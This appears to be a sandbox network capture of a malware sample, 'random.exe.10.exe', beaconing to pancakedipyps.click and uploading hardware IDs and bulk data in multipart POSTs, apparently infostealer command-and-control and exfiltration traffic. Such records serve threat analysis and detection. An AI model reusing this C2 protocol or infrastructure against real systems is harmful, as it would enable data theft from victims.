2024-12-18 12:49:48 UTC	1036	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u4cto7oj9h8j5tlkd1jhodsn49; expires=Sun, 13-Apr-2025 06:36:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZFWHZ8cB%2FvFxtxBCgiEp2V1V%2BRj8WTjA7YQTht8xrvtbKdrCDmvNTcyXGMFX6ZWtkG3JIkxEHZ8gLjZLp6cYPuoCuGwYdcO7yLE%2FoO2DrKGpJULMsTsbY8U28HSLvK0cULfOX92"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f4661c94c41f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2128&rtt_var=802&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1360671&cwnd=211&unsent_bytes=0&cid=a932f0bbf3f5e91d&ts=975&x=0"
2024-12-18 12:49:48 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 12:49:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49713	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:49 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: pancakedipyps.click
2024-12-18 12:49:49 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
2024-12-18 12:49:50 UTC	1034	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oua7p1c8onp19bqmm3vg095ag1; expires=Sun, 13-Apr-2025 06:36:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F7vY80Nyyz6TdisANJKCKIJR3LcFXm7AKVS4NvvLwRP6DnagljknjRcACZHvsPduC%2BgB5F1pR6fQ5JyJgcLNgAWwQ6XaU8Kq37ewE4cEfZyja8fSgBgB4rwRxpBsUJU%2Fq5BfpZLL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f466f1e251780-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1503&rtt_var=580&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=949&delivery_rate=1862244&cwnd=171&unsent_bytes=0&cid=e48dcf4fa0bab546&ts=968&x=0"
2024-12-18 12:49:50 UTC	335	IN	Data Raw: 34 64 63 0d 0a 67 75 31 66 55 56 79 68 37 59 6c 2b 36 67 37 6e 78 4d 66 58 4d 64 61 35 68 64 31 31 39 4d 55 68 4e 59 35 57 39 64 4f 50 73 2b 76 35 7a 79 6c 7a 5a 70 58 42 71 77 32 50 4c 4e 32 77 74 61 4a 55 2b 70 76 6b 75 56 66 4f 6f 30 42 5a 2f 54 50 5a 38 66 6e 65 79 62 69 4c 50 6a 30 76 78 4d 47 72 47 35 49 73 33 5a 2b 38 39 56 53 34 6d 37 2f 2f 45 4a 36 6e 51 46 6e 73 4e 35 36 38 2f 39 2b 49 36 6f 45 34 4f 54 6e 43 69 65 67 53 68 32 75 43 6f 61 61 39 58 37 2f 55 37 62 42 58 32 4f 64 45 54 36 78 73 31 35 37 71 78 34 72 50 6a 43 77 36 66 74 7a 42 38 6c 79 50 59 4d 58 2b 35 62 5a 55 74 4e 58 6a 75 52 36 63 72 55 6c 52 37 54 4b 66 6f 2b 62 56 67 2b 71 50 4f 7a 67 7a 79 35 33 6c 47 49 42 67 68 4b 75 6d 39 52 33 30 33 50 2f 2f 54 39 62 30 63 56 54 39 4a 59 Data Ascii: 4dcgu1fUVyh7Yl+6g7nxMfXMda5hd119MUhNY5W9dOPs+v5zylzZpXBqw2PLN2wtaJU+pvkuVfOo0BZ/TPZ8fneybiLPj0vxMGrG5Is3Z+89VS4m7//EJ6nQFnsN568/9+I6oE4OTnCiegSh2uCoaa9X7/U7bBX2OdET6xs157qx4rPjCw6ftzB8lyPYMX+5bZUtNXjuR6crUlR7TKfo+bVg+qPOzgzy53lGIBghKum9R303P//T9b0cVT9JY
2024-12-18 12:49:50 UTC	916	IN	Data Raw: 49 58 38 33 71 4f 38 65 72 64 79 62 6a 50 4f 7a 30 2f 7a 6f 2f 35 46 49 4e 6e 67 4c 53 75 76 46 36 35 32 2b 71 31 47 4a 57 6e 52 46 33 6d 4f 35 32 31 34 4e 79 50 34 49 39 39 66 58 37 45 6c 36 74 45 79 45 2b 41 74 71 4b 35 52 66 62 68 70 36 42 5a 6a 2b 64 45 57 36 78 73 31 37 6e 6f 30 6f 72 72 67 44 34 37 4e 64 47 50 2b 52 71 46 61 5a 65 67 6f 4c 74 5a 74 38 6e 74 73 52 47 56 72 6b 68 65 36 54 4f 54 38 61 4f 52 6a 76 6a 50 5a 58 4d 66 7a 6f 54 6e 46 70 39 73 78 62 6e 72 72 42 4f 7a 31 36 66 6e 56 35 4b 6d 52 31 62 6f 4f 70 6d 31 34 64 65 48 37 59 41 37 4f 54 37 45 68 65 4d 55 69 57 47 4f 71 61 57 77 58 72 44 64 36 37 34 53 31 75 6b 44 55 50 52 30 7a 2f 48 44 31 6f 72 79 7a 51 67 77 4d 4d 32 49 2f 56 79 58 49 70 7a 6d 6f 72 6b 54 37 4a 76 70 75 68 69 45 70 Data Ascii: IX83qO8erdybjPOz0/zo/5FINngLSuvF652+q1GJWnRF3mO5214NyP4I99fX7El6tEyE+AtqK5Rfbhp6BZj+dEW6xs17no0orrgD47NdGP+RqFaZegoLtZt8ntsRGVrkhe6TOT8aORjvjPZXMfzoTnFp9sxbnrrBOz16fnV5KmR1boOpm14deH7YA7OT7EheMUiWGOqaWwXrDd674S1ukDUPR0z/HD1oryzQgwMM2I/VyXIpzmorkT7JvpuhiEp
2024-12-18 12:49:50 UTC	1369	IN	Data Raw: 34 34 34 30 0d 0a 79 59 48 6b 46 6f 42 6b 68 61 75 6b 76 6c 75 79 31 75 79 77 47 4a 47 76 51 46 76 70 4f 5a 54 78 6f 35 47 4f 2b 4d 39 6c 63 78 76 4e 6a 50 6f 4e 79 6c 6d 47 71 4b 75 79 52 66 54 45 71 61 5a 58 6b 61 73 44 44 36 77 2b 6b 4c 62 70 33 49 50 6a 69 7a 6b 2b 4d 63 71 47 34 67 36 43 59 49 75 30 71 4c 39 57 75 74 66 69 73 42 65 58 70 6b 31 64 35 33 54 5a 38 65 72 4a 79 62 6a 50 45 6a 34 75 30 59 58 67 44 63 70 5a 68 71 69 72 73 6b 58 30 78 4b 6d 6d 56 35 47 72 41 77 2b 73 50 35 47 39 34 64 47 50 38 6f 45 79 49 54 54 52 69 2b 55 59 68 47 4b 4d 71 36 71 77 51 62 44 62 39 62 34 53 6b 61 6c 4f 52 65 6c 30 32 66 48 71 79 63 6d 34 7a 77 63 48 4f 64 4f 65 37 46 36 39 62 34 75 6f 6f 71 4d 54 71 35 58 2b 2f 78 43 61 35 78 73 58 37 7a 69 61 75 4f 6a 65 6d Data Ascii: 4440yYHkFoBkhaukvluy1uywGJGvQFvpOZTxo5GO+M9lcxvNjPoNylmGqKuyRfTEqaZXkasDD6w+kLbp3IPjizk+McqG4g6CYIu0qL9WutfisBeXpk1d53TZ8erJybjPEj4u0YXgDcpZhqirskX0xKmmV5GrAw+sP5G94dGP8oEyITTRi+UYhGKMq6qwQbDb9b4SkalORel02fHqycm4zwcHOdOe7F69b4uooqMTq5X+/xCa5xsX7ziauOjem
2024-12-18 12:49:50 UTC	1369	IN	Data Raw: 7a 4e 4e 47 4b 35 52 69 43 61 59 47 71 72 37 56 57 70 74 50 68 75 42 75 65 6f 6b 78 52 36 54 6d 51 75 75 37 44 6d 2b 4f 4c 4d 7a 39 2b 6a 63 2f 73 42 4d 67 30 78 59 4f 79 74 6b 4f 79 32 4b 65 67 57 59 2f 6e 52 46 75 73 62 4e 65 78 34 39 32 43 35 34 51 32 4e 7a 72 44 67 75 41 53 68 6d 57 4a 72 71 6d 79 51 62 6e 65 37 37 55 65 6b 36 74 4f 56 50 34 33 6c 76 47 6a 6b 59 37 34 7a 32 56 7a 47 66 43 34 79 46 79 58 49 70 7a 6d 6f 72 6b 54 37 4a 76 6d 74 78 43 59 6f 31 46 5a 2f 6a 71 51 73 65 76 5a 67 65 65 44 4d 7a 30 73 79 34 37 72 45 6f 64 6b 6a 4b 4b 6b 73 56 65 34 33 4b 66 78 56 35 47 2f 41 77 2b 73 48 4a 53 72 39 35 4f 6e 36 34 38 36 49 79 6a 59 7a 2f 52 53 6b 53 79 43 71 75 58 74 45 37 44 51 37 62 59 55 6e 36 4e 4f 56 2b 55 37 6e 72 6e 67 32 5a 76 68 68 53 Data Ascii: zNNGK5RiCaYGqr7VWptPhuBueokxR6TmQuu7Dm+OLMz9+jc/sBMg0xYOytkOy2KegWY/nRFusbNex492C54Q2NzrDguAShmWJrqmyQbne77Uek6tOVP43lvGjkY74z2VzGfC4yFyXIpzmorkT7JvmtxCYo1FZ/jqQsevZgeeDMz0sy47rEodkjKKksVe43KfxV5G/Aw+sHJSr95On6486IyjYz/RSkSyCquXtE7DQ7bYUn6NOV+U7nrng2ZvhhS
2024-12-18 12:49:50 UTC	1369	IN	Data Raw: 67 2b 45 54 69 32 53 49 70 61 32 6e 55 37 6e 62 39 61 30 52 6e 61 6b 44 47 61 77 7a 6a 2f 47 31 6b 62 6a 33 68 48 30 73 63 4e 72 50 37 42 44 49 4e 4d 57 6c 72 37 68 64 70 74 2f 68 74 42 53 59 72 30 5a 66 36 44 36 61 76 75 62 62 67 4f 69 50 4d 6a 59 32 79 49 6e 6c 48 59 35 67 69 4f 62 72 39 56 53 73 6d 37 2f 2f 4d 49 79 71 52 55 44 39 41 5a 43 78 76 4a 47 57 72 70 5a 39 4e 44 4b 44 31 36 73 52 68 47 61 49 6f 36 47 39 56 4c 66 61 36 37 73 61 6d 36 4e 4b 55 2b 6b 6d 68 62 66 6a 30 59 62 75 67 44 45 68 4d 4d 61 50 35 31 7a 47 4c 49 4b 2b 35 65 30 54 68 63 7a 6e 2f 77 6a 59 76 67 4e 51 34 48 54 50 38 65 4c 63 6d 2b 79 41 50 54 49 39 78 34 54 73 47 6f 35 74 68 71 4f 6d 73 46 57 31 32 2b 75 31 45 4a 36 74 54 56 72 71 4d 4a 47 33 72 5a 2f 4a 35 35 64 39 61 33 37 Data Ascii: g+ETi2SIpa2nU7nb9a0RnakDGawzj/G1kbj3hH0scNrP7BDINMWlr7hdpt/htBSYr0Zf6D6avubbgOiPMjY2yInlHY5giObr9VSsm7//MIyqRUD9AZCxvJGWrpZ9NDKD16sRhGaIo6G9VLfa67sam6NKU+kmhbfj0YbugDEhMMaP51zGLIK+5e0Thczn/wjYvgNQ4HTP8eLcm+yAPTI9x4TsGo5thqOmsFW12+u1EJ6tTVrqMJG3rZ/J55d9a37
2024-12-18 12:49:50 UTC	1369	IN	Data Raw: 49 39 73 69 61 6d 69 76 56 79 77 32 2b 6a 2f 57 64 61 67 57 78 65 30 64 4c 65 36 2b 2f 43 48 36 35 31 39 4c 48 44 61 7a 2b 77 51 79 44 54 46 71 4b 79 30 57 37 72 58 37 37 73 46 6c 71 78 4b 57 4f 30 37 6c 37 4c 73 32 34 48 79 69 54 30 34 4e 73 53 48 37 78 4b 61 62 59 72 6d 36 2f 56 55 72 4a 75 2f 2f 79 61 41 6f 45 52 59 72 68 32 51 71 75 7a 62 69 75 75 44 66 53 78 77 32 73 2f 73 45 4d 67 30 78 61 75 70 75 46 65 6d 31 2b 65 2f 48 70 47 74 55 56 6a 6a 4f 5a 53 78 36 4d 4f 49 38 6f 41 32 4e 6a 33 48 67 4f 51 51 67 47 62 46 36 4f 57 79 53 2f 53 44 70 35 4d 55 68 36 30 42 63 50 59 69 6b 4c 33 38 32 6f 54 73 7a 79 4a 39 4a 34 4f 49 35 31 7a 51 4c 49 57 6e 71 4b 64 57 74 64 48 74 73 68 2b 5a 6f 6b 5a 59 36 44 43 63 76 2f 2f 66 68 75 43 4a 4e 6a 49 37 77 49 54 68 Data Ascii: I9siamivVyw2+j/WdagWxe0dLe6+/CH6519LHDaz+wQyDTFqKy0W7rX77sFlqxKWO07l7Ls24HyiT04NsSH7xKabYrm6/VUrJu//yaAoERYrh2QquzbiuuDfSxw2s/sEMg0xaupuFem1+e/HpGtUVjjOZSx6MOI8oA2Nj3HgOQQgGbF6OWyS/SDp5MUh60BcPYikL382oTszyJ9J4OI51zQLIWnqKdWtdHtsh+ZokZY6DCcv//fhuCJNjI7wITh
2024-12-18 12:49:50 UTC	1369	IN	Data Raw: 36 69 72 4c 42 62 74 39 37 69 74 52 75 61 70 6b 74 65 35 6a 47 53 74 2b 66 53 68 2b 2b 4f 4d 54 63 33 7a 59 61 72 55 73 68 72 6e 65 62 39 39 57 57 6b 33 50 2b 79 42 39 53 56 51 45 62 39 49 5a 71 68 36 35 4f 6d 34 34 4d 2b 4e 6a 6e 54 7a 2f 52 53 6b 53 79 43 71 75 58 74 45 37 54 66 36 37 77 51 6d 4b 68 4f 57 4f 73 2f 6d 4c 76 6a 77 34 62 6c 68 7a 45 37 4d 39 47 46 34 51 36 42 5a 59 69 6f 72 61 64 51 39 4a 57 6e 75 41 2f 57 2f 77 4e 6c 35 6a 65 62 70 2b 44 65 79 66 2f 42 4a 48 4d 35 7a 38 2b 7a 58 4a 70 2b 68 61 32 6c 73 6c 32 6d 32 75 2b 77 48 5a 61 68 53 46 33 76 50 5a 4f 2f 35 4e 65 49 37 59 34 38 4d 7a 76 44 68 76 6b 52 79 43 4c 46 6f 62 33 31 43 2f 54 73 36 37 51 6d 6c 62 45 44 53 4b 49 74 31 37 62 68 6b 64 47 67 6a 69 38 2b 4e 73 65 50 35 68 71 44 62 Data Ascii: 6irLBbt97itRuapkte5jGSt+fSh++OMTc3zYarUshrneb99WWk3P+yB9SVQEb9IZqh65Om44M+NjnTz/RSkSyCquXtE7Tf67wQmKhOWOs/mLvjw4blhzE7M9GF4Q6BZYioradQ9JWnuA/W/wNl5jebp+Deyf/BJHM5z8+zXJp+ha2lsl2m2u+wHZahSF3vPZO/5NeI7Y48MzvDhvkRyCLFob31C/Ts67QmlbEDSKIt17bhkdGgji8+NseP5hqDb
2024-12-18 12:49:50 UTC	1369	IN	Data Raw: 37 45 36 61 62 76 2f 39 51 6c 62 56 52 55 65 38 69 6c 50 62 54 37 36 6e 72 6d 54 77 2b 4e 63 2b 78 31 51 6d 4c 59 6f 75 68 73 36 51 54 2b 70 76 6f 2f 30 2b 76 35 77 73 58 30 33 72 58 71 61 32 4a 79 64 57 4d 4d 7a 30 35 31 5a 36 6d 50 49 4e 36 68 4b 75 75 75 52 47 31 31 76 65 34 56 39 6a 6e 52 52 65 30 5a 4e 6e 78 36 63 44 4a 75 4e 39 76 61 47 75 51 32 4c 74 4f 6c 79 4b 63 35 72 50 31 43 2b 61 56 70 36 31 58 7a 75 63 45 56 50 34 6d 6b 62 4c 37 30 73 37 65 73 52 30 34 4d 73 43 44 36 68 76 49 49 73 57 70 35 65 31 71 39 4e 6a 31 72 56 69 48 73 55 35 48 36 33 69 66 6f 4f 44 64 79 61 37 50 63 54 63 31 7a 34 72 73 44 4d 64 2b 6c 61 32 70 6f 78 2b 77 79 61 66 78 56 34 65 73 54 45 58 69 4d 39 69 67 2b 39 79 5a 34 34 6f 36 66 7a 62 53 67 75 64 63 78 69 79 51 72 61 Data Ascii: 7E6abv/9QlbVRUe8ilPbT76nrmTw+Nc+x1QmLYouhs6QT+pvo/0+v5wsX03rXqa2JydWMMz051Z6mPIN6hKuuuRG11ve4V9jnRRe0ZNnx6cDJuN9vaGuQ2LtOlyKc5rP1C+aVp61XzucEVP4mkbL70s7esR04MsCD6hvIIsWp5e1q9Nj1rViHsU5H63ifoODdya7PcTc1z4rsDMd+la2pox+wyafxV4esTEXiM9ig+9yZ44o6fzbSgudcxiyQra
2024-12-18 12:49:50 UTC	1369	IN	Data Raw: 30 65 44 7a 58 39 71 32 55 46 6e 6e 49 70 44 78 30 70 2f 4a 2b 4d 39 6c 63 77 76 41 67 65 55 62 6e 6e 33 49 67 4b 61 79 56 62 66 56 38 4b 35 58 32 4f 64 46 46 37 52 6d 32 66 48 70 77 4d 6d 34 33 32 39 6f 61 35 44 59 75 30 36 58 49 70 7a 6d 73 2f 55 4c 35 35 57 6e 72 56 66 4f 35 77 52 5a 34 54 57 55 76 2b 37 44 6d 2b 61 4d 4b 7a 42 35 2f 62 48 4f 45 59 56 70 69 36 47 62 69 33 4b 2b 79 2b 71 77 45 4b 69 5a 64 45 62 72 4a 4e 57 58 37 73 65 4b 6f 4d 46 39 4b 33 36 62 7a 38 6f 57 6d 47 47 4b 6f 65 58 37 45 37 43 62 76 2f 38 79 6d 36 70 47 57 65 74 32 74 72 76 39 33 49 62 6e 7a 33 4e 7a 4d 6f 50 58 71 78 32 43 66 49 69 70 6f 76 6c 55 72 74 79 6e 38 56 65 59 35 78 73 58 37 54 36 48 76 4f 4c 57 78 65 61 42 4d 33 4d 68 6a 5a 61 72 43 73 67 30 31 75 6a 6c 70 78 50 Data Ascii: 0eDzX9q2UFnnIpDx0p/J+M9lcwvAgeUbnn3IgKayVbfV8K5X2OdFF7Rm2fHpwMm4329oa5DYu06XIpzms/UL55WnrVfO5wRZ4TWUv+7Dm+aMKzB5/bHOEYVpi6Gbi3K+y+qwEKiZdEbrJNWX7seKoMF9K36bz8oWmGGKoeX7E7Cbv/8ym6pGWet2trv93Ibnz3NzMoPXqx2CfIipovlUrtyn8VeY5xsX7T6HvOLWxeaBM3MhjZarCsg01ujlpxP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49714	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:52 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EKLZN1L1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12784 Host: pancakedipyps.click
2024-12-18 12:49:52 UTC	12784	OUT	Data Raw: 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 45 4b 4c 5a 4e 31 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --EKLZN1L1Content-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--EKLZN1L1Content-Disposition: form-data; name="pid"2--EKLZN1L1Content-Disposition: form-data; name="lid"FATE99--test--EKLZN1L1Content-Dispositi
2024-12-18 12:49:53 UTC	1044	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bq94d7lv3ja97gsjlg5u4p9ltq; expires=Sun, 13-Apr-2025 06:36:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bF9er4PRu%2Bp8KGvF%2BWxYcJe7uPOKGj0zZYqq5SqOR7yDvStUkEDYMzUaIi0XeyyWcOYEedMdOmRg%2Blf8l2DwsaZbyYQeHg6u1xt%2F0hamW6V0zt3sVxRlJM%2BHJtRh2fe8oGRKKwrw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46821d3c8c57-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2064&rtt_var=790&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2849&recv_bytes=13717&delivery_rate=1372180&cwnd=216&unsent_bytes=0&cid=4edfe3415751bb95&ts=1076&x=0"
2024-12-18 12:49:53 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:49:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49715	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:55 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RLMLEXFN40IEXJDRL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15056 Host: pancakedipyps.click
2024-12-18 12:49:55 UTC	15056	OUT	Data Raw: 2d 2d 52 4c 4d 4c 45 58 46 4e 34 30 49 45 58 4a 44 52 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 4c 4d 4c 45 58 46 4e 34 30 49 45 58 4a 44 52 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 4c 4d 4c 45 58 46 4e 34 30 49 45 58 4a 44 52 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d Data Ascii: --RLMLEXFN40IEXJDRLContent-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--RLMLEXFN40IEXJDRLContent-Disposition: form-data; name="pid"2--RLMLEXFN40IEXJDRLContent-Disposition: form-data; name="lid"FATE99--test--
2024-12-18 12:49:56 UTC	1043	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e521amqm0bfv4af5dl2180nu01; expires=Sun, 13-Apr-2025 06:36:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtO4El4aK5E7%2F6GTSSRXF17Yaig%2BjXDM6SgUe35EcG92yr0llGpcA8GCi674msUGp8HPYh9brYffoZ0muo0SefgdmcemD07QeLdE%2B3sJ9%2BWObH1RMgMcR4IBQsANNixr%2FBi67m2T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f4690fe0bc45c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1537&rtt_var=647&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2849&recv_bytes=15998&delivery_rate=1899804&cwnd=242&unsent_bytes=0&cid=9221216ff372ddc2&ts=943&x=0"
2024-12-18 12:49:56 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:49:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49716	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:57 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FI5E5W32HIH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20536 Host: pancakedipyps.click
2024-12-18 12:49:57 UTC	15331	OUT	Data Raw: 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65 Data Ascii: --FI5E5W32HIHContent-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--FI5E5W32HIHContent-Disposition: form-data; name="pid"3--FI5E5W32HIHContent-Disposition: form-data; name="lid"FATE99--test--FI5E5W32HIHConte
2024-12-18 12:49:57 UTC	5205	OUT	Data Raw: a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: s}Q0u?4E([:s~X`nO
